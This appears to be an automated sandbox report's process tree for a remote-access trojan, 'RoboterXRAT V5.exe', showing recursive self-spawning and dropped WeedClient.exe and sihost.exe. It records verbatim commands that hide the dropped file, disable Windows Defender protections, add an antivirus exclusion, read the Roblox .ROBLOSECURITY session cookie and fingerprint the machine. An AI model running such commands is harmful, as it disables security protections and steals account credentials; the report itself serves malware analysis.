        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        13⤵
        Executes dropped EXE
        
        PID:3236
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        14⤵
        Executes dropped EXE
        
        PID:5652
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        15⤵
        Executes dropped EXE
        
        PID:6616
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        16⤵
        
        PID:1340
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        17⤵
        
        PID:5688
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        18⤵
        
        PID:5648
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        19⤵
        
        PID:1872
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        20⤵
        
        PID:6148
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        21⤵
        
        PID:5892
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        22⤵
        
        PID:5876
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        23⤵
        
        PID:5848
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        24⤵
        
        PID:4164
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        25⤵
        
        PID:6808
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        26⤵
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        27⤵
        
        PID:4052
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        28⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        29⤵
        
        PID:6120
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        30⤵
        
        PID:5620
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        31⤵
        
        PID:6372
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        32⤵
        
        PID:7156
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        33⤵
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        34⤵
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        35⤵
        
        PID:5524
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        36⤵
        
        PID:7032
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        37⤵
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        38⤵
        
        PID:6204
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        39⤵
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        40⤵
        
        PID:1400
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        41⤵
        
        PID:6520
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        42⤵
        
        PID:5980
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        43⤵
        
        PID:5780
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        44⤵
        
        PID:5412
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        45⤵
        
        PID:6176
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        46⤵
        
        PID:5872
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        47⤵
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        48⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        49⤵
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        50⤵
        
        PID:5524
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        51⤵
        
        PID:5568
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        52⤵
        
        PID:5172
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        53⤵
        
        PID:5752
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        54⤵
        
        PID:384
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        55⤵
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        56⤵
        
        PID:6516
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        57⤵
        
        PID:5900
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        58⤵
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        59⤵
        
        PID:904
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        60⤵
        
        PID:1368
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        61⤵
        
        PID:2252
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        62⤵
        
        PID:6440
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        63⤵
        
        PID:6796
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        64⤵
        
        PID:6044
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        65⤵
        
        PID:6844
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        66⤵
        
        PID:7096
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        67⤵
        
        PID:6988
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        68⤵
        
        PID:888
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        69⤵
        
        PID:6120
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        70⤵
        
        PID:6740
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        71⤵
        
        PID:6592
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        72⤵
        
        PID:6192
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        73⤵
        
        PID:5560
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        74⤵
        
        PID:1180
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        75⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        76⤵
        
        PID:6816
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        77⤵
        
        PID:4920
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        78⤵
        
        PID:5344
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        79⤵
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        79⤵
        
        PID:568
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        79⤵
        
        PID:6892
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        78⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        78⤵
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        77⤵
        
        PID:5476
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        77⤵
        
        PID:5732
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        76⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        76⤵
        
        PID:5872
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        75⤵
        
        PID:248
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        75⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        74⤵
        
        PID:6004
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        74⤵
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        73⤵
        
        PID:6572
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        73⤵
        
        PID:7052
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        72⤵
        
        PID:5348
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        72⤵
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        71⤵
        
        PID:6992
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        71⤵
        
        PID:6200
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        70⤵
        
        PID:6940
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        70⤵
        
        PID:5136
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        69⤵
        
        PID:1448
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        69⤵
        
        PID:3980
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        68⤵
        
        PID:5412
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        68⤵
        
        PID:3500
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        67⤵
        
        PID:1080
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        67⤵
        
        PID:6376
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        66⤵
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        66⤵
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        65⤵
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        65⤵
        
        PID:3332
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        64⤵
        
        PID:6224
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        64⤵
        
        PID:6372
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        63⤵
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        63⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        62⤵
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        62⤵
        
        PID:1212
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        61⤵
        
        PID:5220
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        61⤵
        
        PID:5372
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        60⤵
        
        PID:6396
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        60⤵
        
        PID:6828
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        59⤵
        
        PID:5684
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        59⤵
        
        PID:6920
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        58⤵
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        58⤵
        
        PID:5616
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        57⤵
        
        PID:3868
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        57⤵
        
        PID:6040
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        56⤵
        
        PID:540
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        56⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        55⤵
        
        PID:7048
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        55⤵
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        54⤵
        
        PID:6424
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        54⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        53⤵
        
        PID:5368
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        53⤵
        
        PID:6028
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        52⤵
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        52⤵
        
        PID:7064
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        51⤵
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        51⤵
        
        PID:612
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        50⤵
        
        PID:2936
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        50⤵
        
        PID:6360
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        51⤵
        
        PID:5320
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        51⤵
        Views/modifies file attributes
        
        PID:6600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3036
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        52⤵
        
        PID:844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        51⤵
        
        PID:6988
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        51⤵
        
        PID:2780
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        51⤵
        
        PID:6656
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        51⤵
        
        PID:6880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6576
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        52⤵
        
        PID:4876
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        51⤵
        Detects videocard installed
        
        PID:6984
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        51⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4168
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        52⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5468
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        49⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        49⤵
        
        PID:6920
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        48⤵
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        48⤵
        
        PID:6280
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        47⤵
        
        PID:5480
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        47⤵
        
        PID:6892
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        48⤵
        
        PID:5632
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        48⤵
        Views/modifies file attributes
        
        PID:1296
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        49⤵
        
        PID:5216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        48⤵
        
        PID:5436
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        48⤵
        
        PID:6848
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        48⤵
        
        PID:6436
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        48⤵
        
        PID:5844
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5844 -s 352
        49⤵
        
        PID:7144
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6892 -s 2304
        48⤵
        
        PID:2896
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        46⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        46⤵
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        45⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        45⤵
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        44⤵
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        44⤵
        
        PID:6648
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        45⤵
        
        PID:6360
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        46⤵
        
        PID:6536
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        45⤵
        Views/modifies file attributes
